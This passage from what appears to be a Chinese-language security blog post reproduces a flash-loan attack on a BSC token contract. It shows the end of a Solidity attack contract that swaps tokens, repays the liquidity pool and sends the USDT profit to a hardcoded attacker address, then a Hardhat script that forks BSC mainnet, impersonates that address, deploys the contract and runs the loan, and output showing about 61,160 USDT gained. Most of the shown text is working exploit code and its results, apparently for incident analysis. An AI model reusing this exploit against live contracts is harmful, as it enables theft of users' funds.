class="title class_">Zoom</span>.<span class="title function_">approve</span>(swap, baz*<span class="number">100</span>);</span><br><span class="line">        <span class="title function_">IUSD</span>(swap).<span class="title function_">sell</span>(baz);</span><br><span class="line"></span><br><span class="line">        <span class="title class_">Usdt</span>.<span class="title function_">transfer</span>(<span class="title function_">address</span>(<span class="variable constant_">LP</span>),(ba*<span class="number">10030</span>)/<span class="number">10000</span>);<span class="comment">//tra tien</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line">        uint256 U= <span class="title class_">Usdt</span>.<span class="title function_">balanceOf</span>(<span class="title function_">address</span>(<span class="variable language_">this</span>));</span><br><span class="line">        <span class="title class_">IERC20</span>(usdt).<span class="title function_">transfer</span>(<span class="number">0xc578d755cd56255d3ff6e92e1b6371ba945e3984</span>,U);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<p>使用hardhat fork  bsc 主网 21055930区块：</p>
<p>攻击脚本：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> hre = <span class="built_in">require</span>(<span class="string">&#x27;hardhat&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">async</span> <span class="keyword">function</span> <span class="title function_">main</span>(<span class="params"></span>)&#123;</span><br><span class="line">    <span class="keyword">const</span> attackAddr = <span class="string">&quot;0xc578d755cd56255d3ff6e92e1b6371ba945e3984&quot;</span></span><br><span class="line">    <span class="keyword">const</span> usdtAddress = <span class="string">&quot;0x55d398326f99059fF775485246999027B3197955&quot;</span></span><br><span class="line">    <span class="keyword">const</span> amount = <span class="number">3000000000000000000000000</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    <span class="comment">//step1 deploy attack contract</span></span><br><span class="line">    <span class="keyword">await</span> hre.<span class="property">network</span>.<span class="property">provider</span>.<span class="title function_">request</span>(&#123;</span><br><span class="line">        <span class="attr">method</span>:<span class="string">&quot;hardhat_impersonateAccount&quot;</span>,</span><br><span class="line">        <span class="attr">params</span>:[attackAddr]</span><br><span class="line">    &#125;)</span><br><span class="line">    <span class="keyword">const</span> signer = <span class="keyword">await</span> hre.<span class="property">ethers</span>.<span class="title function_">getSigner</span>(attackAddr)</span><br><span class="line">    <span class="keyword">let</span> attackcontract = <span class="keyword">await</span> hre.<span class="property">ethers</span>.<span class="title function_">getContractFactory</span>(<span class="string">&quot;flashloan&quot;</span>,signer)</span><br><span class="line">    <span class="keyword">let</span> usdtContract = <span class="keyword">await</span> hre.<span class="property">ethers</span>.<span class="title function_">getContractAt</span>(<span class="string">&#x27;IBEP20&#x27;</span>,usdtAddress)</span><br><span class="line">    <span class="keyword">let</span> attackContract = <span class="keyword">await</span> attackcontract.<span class="title function_">deploy</span>()</span><br><span class="line">    <span class="keyword">await</span> attackContract.<span class="title function_">deployed</span>()</span><br><span class="line">    <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;attack contract deployed address is:&quot;</span>,attackContract.<span class="property">address</span>)</span><br><span class="line">    <span class="keyword">const</span> bal1 = <span class="keyword">await</span> usdtContract.<span class="title function_">balanceOf</span>(attackAddr)</span><br><span class="line">    <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;before attack hacker usdt balance is:&quot;</span>,bal1/<span class="number">1e18</span>)</span><br><span class="line">    <span class="comment">//step2 excute flashloan</span></span><br><span class="line">    <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;start attack....&quot;</span>)</span><br><span class="line">    <span class="keyword">await</span> attackContract.<span class="title function_">loan</span>(<span class="title class_">BigInt</span>(amount))</span><br><span class="line">    <span class="keyword">const</span> bal2 = <span class="keyword">await</span> usdtContract.<span class="title function_">balanceOf</span>(attackAddr)</span><br><span class="line">    <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;attack complete usdt balance is :&quot;</span>,bal2/<span class="number">1e18</span>)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="title function_">main</span>()</span><br></pre></td></tr></table></figure>



<p>结果如下：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">attack contract deployed address <span class="attr">is</span>: <span class="number">0x95eaaA92eE4e383e728959083F4B9fd3C21227FB</span></span><br><span class="line">before attack hacker usdt balance <span class="attr">is</span>: <span class="number">0</span></span><br><span class="line">start attack....</span><br><span class="line">attack complete usdt balance is : <span class="number">61160.28312893072</span></span><br></pre></td></tr></table></figure>





                
            </div>

            <!-- Comments -->
            
                <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                    


                </div>
            
        </div>
    </div>
</article>

    <!-- Footer -->
    <hr />

<!-- Footer -->
<footer>
    <div class="container">
        <div class="row">
            <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                <ul class="list-inline text-center">
                    

                    

                    
                        <li>
                            <a href="https://github.com/klugjo/hexo-theme-clean-blog" target="_blank">
                                <span class="fa-stack fa-lg">
                                    <i class="fa fa-circle fa-stack-2x"></i>
                                    <i class="fa fa-github fa-stack-1x fa-inverse"></i>
                                </span>
                            </a>
                        </li>
                    

                    

                    

                    
                </ul>
                <p class="copyright text-muted">&copy; 2022 d1rrick<br></p>
                <p class="copyright text-muted">Original Theme <a target="_blank" href="http://startbootstrap.com/template-overviews/clean-blog/">Clean Blog</a> from <a href="http://startbootstrap.com/" target="_blank">Start Bootstrap</a></p>
                <p class="copyright text-muted">Adapted for <a target="_blank" href="https://hexo.io/">Hexo</a> by <a href="http://www.codeblocq.com/" target="_blank">Jonathan Klughertz</a></p>
            </div>
        </div>
    </div>
</footer>


    <!-- After footer scripts -->
    
<!-- jQuery -->
<script src="//code.jquery.com/jquery-2.1.4.min.js"></script>

<!-- Bootstrap -->
<script src="//maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script>

<!-- Gallery -->
<script src="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.js" type="text/javascript" charset="utf-8"></script>

<!-- Disqus Comments -->



</body>

</html>